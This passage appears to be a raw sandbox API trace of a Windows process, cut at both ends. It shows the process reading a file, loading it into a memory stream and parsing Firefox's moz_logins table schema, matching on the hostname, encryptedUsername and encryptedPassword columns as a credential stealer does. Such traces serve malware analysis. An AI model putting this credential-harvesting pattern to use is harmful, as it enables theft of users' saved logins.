lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x1000, lpOverlapped=0x0) returned 1 [0589.415] IStream:Commit (This=0x598228, grfCommitFlags=0x52cf84) returned 0x0 [0589.415] ReadFile (in: hFile=0x668, lpBuffer=0x52cf84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cf7c, lpOverlapped=0x0 | out: lpBuffer=0x52cf84*, lpNumberOfBytesRead=0x52cf7c*=0x0, lpOverlapped=0x0) returned 1 [0589.415] CloseHandle (hObject=0x668) returned 1 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.415] IStream:SetSize (This=0x598228, libNewSize=0x52df64) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0589.415] IStream:SetSize (This=0x598228, libNewSize=0x52df4e) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.415] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x12, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52df4f) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x13, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52df4f) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52df4f) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52df4f) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52df4f) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x17, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52df4f) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x20, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52df4c) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x3c, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x28, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x64, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x64, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52def3) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x65, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x67, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x69, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x6b, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52def3) returned 0x0 [0589.416] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2f396d0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x6c, cb=0x0, dwLockType=0x0) returned 0x0 [0589.416] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.416] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x6e, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x70, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x72, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x74, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x76, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x78, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x7a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x7c, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52def2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x7e1a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x7e1a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x7e1b, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x7e1c, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.417] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.417] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.417] IStream:LockRegion (This=0x598228, libOffset=0x7e1d, cb=0x0, dwLockType=0x0) returned 0x0 [0589.417] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.417] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.418] LocalFree (hMem=0x2f49758) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0589.418] LocalFree (hMem=0x57c380) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d8d8 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x58d8d8) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x56ffd8 [0589.418] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x8a) returned 0x58d8d8 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x58d8d8) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x92) returned 0x570078 [0589.418] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x20, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0589.418] LocalAlloc (uFlags=0x40, uBytes=0x242) returned 0x5e1d10 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.418] IStream:LockRegion (This=0x55e080, libOffset=0x21, cb=0x0, dwLockType=0x0) returned 0x0 [0589.418] IStream:SetSize (This=0x55e080, libNewSize=0x5e1d10) returned 0x0 [0589.419] LocalAlloc (uFlags=0x40, uBytes=0x24a) returned 0x5a2988 [0589.419] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.419] LocalFree (hMem=0x56fe98) returned 0x0 [0589.419] IUnknown:Release (This=0x55e080) returned 0x0 [0589.419] lstrcmpiA (lpString1="moz_logins", lpString2="moz_logins") returned 0 [0589.419] lstrcmpA (lpString1="table", lpString2="table") returned 0 [0589.419] StrStrIA (lpFirst="CREATE TABLE moz_logins (id INTEGER PRIMARY KEY,hostname TEXT NOT NULL,httpRealm TEXT,formSubmitURL TEXT,usernameField TEXT NOT NULL,passwordField TEXT NOT NULL,encryptedUsername TEXT NOT NULL,encryptedPassword TEXT NOT NULL,guid TEXT,encType INTEGER,timeCreated INTEGER,timeLastUsed INTEGER,timePasswordChanged INTEGER,timesUsed INTEGER)", lpSrch="(") returned="(id INTEGER PRIMARY KEY,hostname TEXT NOT NULL,httpRealm TEXT,formSubmitURL TEXT,usernameField TEXT NOT NULL,passwordField TEXT NOT NULL,encryptedUsername TEXT NOT NULL,encryptedPassword TEXT NOT NULL,guid TEXT,encType INTEGER,timeCreated INTEGER,timeLastUsed INTEGER,timePasswordChanged INTEGER,timesUsed INTEGER)" [0589.419] StrStrIA (lpFirst="id INTEGER PRIMARY KEY,hostname TEXT NOT NULL,httpRealm TEXT,formSubmitURL TEXT,usernameField TEXT NOT NULL,passwordField TEXT NOT NULL,encryptedUsername TEXT NOT NULL,encryptedPassword TEXT NOT NULL,guid TEXT,encType INTEGER,timeCreated INTEGER,timeLastUsed INTEGER,timePasswordChanged INTEGER,timesUsed INTEGER)", lpSrch=")") returned=")" [0589.419] lstrlenA (lpString="id INTEGER PRIMARY KEY") returned 22 [0589.419] StrStrIA (lpFirst="id INTEGER PRIMARY KEY", lpSrch=" ") returned=" INTEGER PRIMARY KEY" [0589.419] lstrlenA (lpString="id") returned 2 [0589.419] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="id", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="id", lpString2="hostname") returned 1 [0589.419] lstrcmpiA (lpString1="id", lpString2="encryptedPassword") returned 1 [0589.419] lstrcmpiA (lpString1="id", lpString2="encryptedUsername") returned 1 [0589.419] lstrlenA (lpString="hostname TEXT NOT NULL") returned 22 [0589.419] StrStrIA (lpFirst="hostname TEXT NOT NULL", lpSrch=" ") returned=" TEXT NOT NULL" [0589.419] lstrlenA (lpString="hostname") returned 8 [0589.419] lstrcmpiA (lpString1="hostname", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="hostname", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="hostname", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="hostname", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="hostname", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="hostname", lpString2="hostname") returned 0 [0589.419] lstrlenA (lpString="httpRealm TEXT") returned 14 [0589.419] StrStrIA (lpFirst="httpRealm TEXT", lpSrch=" ") returned=" TEXT" [0589.419] lstrlenA (lpString="httpRealm") returned 9 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="hostname") returned 1 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="encryptedPassword") returned 1 [0589.419] lstrcmpiA (lpString1="httpRealm", lpString2="encryptedUsername") returned 1 [0589.419] lstrlenA (lpString="formSubmitURL TEXT") returned 18 [0589.419] StrStrIA (lpFirst="formSubmitURL TEXT", lpSrch=" ") returned=" TEXT" [0589.419] lstrlenA (lpString="formSubmitURL") returned 13 [0589.419] lstrcmpiA (lpString1="formSubmitURL", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="formSubmitURL", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="formSubmitURL", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="formSubmitURL", lpString2="CONSTRAINT") returned 1 [0589.419] lstrcmpiA (lpString1="formSubmitURL", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="formSubmitURL", lpString2="hostname") returned -1 [0589.420] lstrcmpiA (lpString1="formSubmitURL", lpString2="encryptedPassword") returned 1 [0589.420] lstrcmpiA (lpString1="formSubmitURL", lpString2="encryptedUsername") returned 1 [0589.420] lstrlenA (lpString="usernameField TEXT NOT NULL") returned 27 [0589.420] StrStrIA (lpFirst="usernameField TEXT NOT NULL", lpSrch=" ") returned=" TEXT NOT NULL" [0589.420] lstrlenA (lpString="usernameField") returned 13 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="hostname") returned 1 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="encryptedPassword") returned 1 [0589.420] lstrcmpiA (lpString1="usernameField", lpString2="encryptedUsername") returned 1 [0589.420] lstrlenA (lpString="passwordField TEXT NOT NULL") returned 27 [0589.420] StrStrIA (lpFirst="passwordField TEXT NOT NULL", lpSrch=" ") returned=" TEXT NOT NULL" [0589.420] lstrlenA (lpString="passwordField") returned 13 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="hostname") returned 1 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="encryptedPassword") returned 1 [0589.420] lstrcmpiA (lpString1="passwordField", lpString2="encryptedUsername") returned 1 [0589.420] lstrlenA (lpString="encryptedUsername TEXT NOT NULL") returned 31 [0589.420] StrStrIA (lpFirst="encryptedUsername TEXT NOT NULL", lpSrch=" ") returned=" TEXT NOT NULL" [0589.420] lstrlenA (lpString="encryptedUsername") returned 17 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="hostname") returned -1 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="encryptedPassword") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedUsername", lpString2="encryptedUsername") returned 0 [0589.420] lstrlenA (lpString="encryptedPassword TEXT NOT NULL") returned 31 [0589.420] StrStrIA (lpFirst="encryptedPassword TEXT NOT NULL", lpSrch=" ") returned=" TEXT NOT NULL" [0589.420] lstrlenA (lpString="encryptedPassword") returned 17 [0589.420] lstrcmpiA 